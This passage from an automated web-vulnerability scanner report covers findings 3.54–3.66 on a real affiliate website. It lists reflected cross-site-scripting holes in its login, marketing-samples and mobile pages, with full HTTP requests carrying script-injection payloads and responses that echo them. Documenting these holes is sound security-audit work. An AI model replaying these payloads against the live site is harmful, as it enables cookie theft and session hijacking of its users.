Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1bdd01\"><script>alert(1)</script>7c3cf6160b7" title="Home">
...[SNIP]...

3.54. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e175"><script>alert(1)</script>d02fb3e546d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e175\"><script>alert(1)</script>d02fb3e546d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2\&8e175"><script>alert(1)</script>d02fb3e546d=1 HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2\\&8e175\"><script>alert(1)</script>d02fb3e546d=1" title="Home">
...[SNIP]...

3.55. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3533"><script>alert(1)</script>c87eee535a4 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as b3533\"><script>alert(1)</script>c87eee535a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1b3533"><script>alert(1)</script>c87eee535a4 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1b3533\"><script>alert(1)</script>c87eee535a4" title="Home">
...[SNIP]...

3.56. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d3a"><script>alert(1)</script>cdc0ff990ea was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as e1d3a\"><script>alert(1)</script>cdc0ff990ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=e1d3a"><script>alert(1)</script>cdc0ff990ea HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=e1d3a\"><script>alert(1)</script>cdc0ff990ea" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.57. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f4f</script><script>alert(1)</script>059ba1b89e was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script><script>alert(1)</script>059ba1b89e HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script><script>alert(1)</script>059ba1b89e';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script>
...[SNIP]...

3.58. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79420"><script>alert(1)</script>acb62a6df93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79420\"><script>alert(1)</script>acb62a6df93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&79420"><script>alert(1)</script>acb62a6df93=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&79420\"><script>alert(1)</script>acb62a6df93=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.59. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42ccb</script><script>alert(1)</script>48b926f12c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script><script>alert(1)</script>48b926f12c9=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
lar").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script><script>alert(1)</script>48b926f12c9=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script>
...[SNIP]...

3.60. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931f9"><script>alert(1)</script>426411977a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 931f9\"><script>alert(1)</script>426411977a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&931f9"><script>alert(1)</script>426411977a5=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&931f9\"><script>alert(1)</script>426411977a5=1" title="Home">
...[SNIP]...

3.61. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e678c"><script>alert(1)</script>c2083c9f32b was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as e678c\"><script>alert(1)</script>c2083c9f32b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e678c"><script>alert(1)</script>c2083c9f32b HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e678c\"><script>alert(1)</script>c2083c9f32b" title="Home">
...[SNIP]...

3.62. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4024</script><script>alert(1)</script>0074ed146f4 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script><script>alert(1)</script>0074ed146f4 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script><script>alert(1)</script>0074ed146f4';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script>
...[SNIP]...

3.63. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>833b2a295e9 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 94895\"><script>alert(1)</script>833b2a295e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=94895"><script>alert(1)</script>833b2a295e9 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=94895\"><script>alert(1)</script>833b2a295e9" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.64. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab351"><script>alert(1)</script>85c0273528c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab351\"><script>alert(1)</script>85c0273528c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&ab351"><script>alert(1)</script>85c0273528c=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&ab351\"><script>alert(1)</script>85c0273528c=1" title="Home">
...[SNIP]...

3.65. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e4bc</script><script>alert(1)</script>34debe0dd4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script><script>alert(1)</script>34debe0dd4c=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
lar").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script><script>alert(1)</script>34debe0dd4c=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script>
...[SNIP]...

3.66. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5944"><script>alert(1)</script>b657ab65e6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5944\"><script>alert(1)</script>b657ab65e6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&c5944"><script>alert(1)</script>b657ab65e6b=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
